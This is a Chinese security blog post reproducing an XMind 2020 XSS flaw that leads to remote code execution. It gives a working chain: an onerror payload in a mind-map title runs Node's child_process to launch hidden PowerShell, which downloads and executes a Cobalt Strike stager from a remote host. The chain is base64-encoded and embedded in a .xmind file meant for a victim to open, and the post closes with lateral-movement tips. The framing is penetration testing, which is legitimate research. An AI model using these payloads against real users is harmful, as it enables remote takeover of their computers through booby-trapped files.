漏洞复现 | X-Mind XSS致使RCE

admin 2022年7月6日09:09:11评论93 views字数 2274阅读7分34秒阅读模式
漏洞复现 | X-Mind XSS致使RCE

点击上方“蓝字”,关注更多精彩

第三方软件的漏洞之前也发过一些,以后会总结一下。它们有时候可以在内网渗透中达到意想不到的效果。

仔细想想,在办公区,就算是程序员,都不一定会及时更新相关软件,同时他们过度依赖于公司的监控设备和人员,还有过度相信杀软的安全。这就产生了一定的风险。

0x00 前言

这是一个比较老旧的漏洞了,首发于2021年5月最新版的X-Mind,但是如今内网还是能看到。

Xmind这个漏洞可以以自定义标题的形式存储恶意代码,当受害者点击或修改自定义标题时,恶意代码将被执行。攻击者可以发送带有恶意代码的.xmind文件,当该文件被打开时,攻击者能远程控制计算机。

其实看过这两篇文章的师傅们,很快就会理解下面的复现了。

Clash RCE漏洞复现与高级利用(配合社工)

利用AntSword RCE进行溯源反制黑客

0x01 环境配置

具有该漏洞的X-Mind 2020 (v10.3.1)Win64位安装包下载地址:
https://dl2.xmind.cn/XMind-2020-for-Windows-64bit-10.3.1-202101070032.exe

靶机为windows10机器,关闭杀软(包含Defender)

0x02 本地XSS复现

1、很简单,只需要打开安装好具有漏洞版本的X-Mind,随便选择一个模板。

漏洞复现 | X-Mind XSS致使RCE

2、在标题处写上<audio src=x onerror=confirm("test")>

漏洞复现 | X-Mind XSS致使RCE

3、然后选择大纲模式编辑这个标题,随便写,甚至我按shift切换一下中英文都会成功弹窗。

漏洞复现 | X-Mind XSS致使RCE

0x03 RCE 上线

1、CS生成一句话上线的powershell命令,复制出来。

漏洞复现 | X-Mind XSS致使RCE

2、放入下面这段代码的相应位置

require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.31.84:80/a'))"',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});

3、将上段代码进行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==

4、再放入下面这段代码对应base64加密后的位置

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

5、复制出来后直接拼接到一个x-mind文件的标题处

漏洞复现 | X-Mind XSS致使RCE

6、点击大纲,切换一下中英文,或者随便输入个字母或者数字就已经上线了

漏洞复现 | X-Mind XSS致使RCE

0x04 总结

1、X-Mind软件基于Node.js开发,所以此XSS漏洞和之前复现的Clash、蚁剑漏洞有些类似。

2、第三方软件的漏洞,远比操作系统自带的服务或者软件多得多,而且利用成本更加低。

3、在内网渗透中,我们拿到任意一台机器,不要着急提权或者内网信息收集,先做好本地的信息收集,例如我找到一个.xts文件,如果你要是知道这是X-shell终端工具导出配置的文件后缀,你还用得着费尽心思去搭建路由跨网段进行内网渗透吗?还需要本地导出注册表dumphash然后PTH吗?渗透的成本会大大降低。

4、渗透测试,不仅仅是只用渗透的技巧,拿到对应的机器,就要化身成对应机器的所有者,去扮演他的角色去渗透,如果他的角色不够用了,再加入我们渗透的技巧与思路。所以有时不要一味去追求高级的操作而忘了基础和基本操作。

0x05 references

https://www.jianshu.com/p/4fd4b2f2dfb5


漏洞复现 | X-Mind XSS致使RCE


往期推荐

红日靶场07通关详解

2022国外安全站点收集

实战经验 | Vultr快速部署OpenVPN代理

实战经验 | VPS部署WireGuard与对OpenVPN的补充

郑重声明该公众号大部分文章来自作者日常工作与学习笔记,也有少数文章是经过原作者授权转载而来,未经授权,严禁转载。如需要,请公众号私信联系作者。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与原作者以及本公众号无关。

漏洞复现 | X-Mind XSS致使RCE
漏洞复现 | X-Mind XSS致使RCE
扫码关注
人若无名便可潜心练剑
专注渗透测试、工具开发


原文始发于微信公众号(HACK技术沉淀营):漏洞复现 | X-Mind XSS致使RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月6日09:09:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | X-Mind XSS致使RCEhttp://cn-sec.com/archives/1160612.html

发表评论

匿名网友 填写信息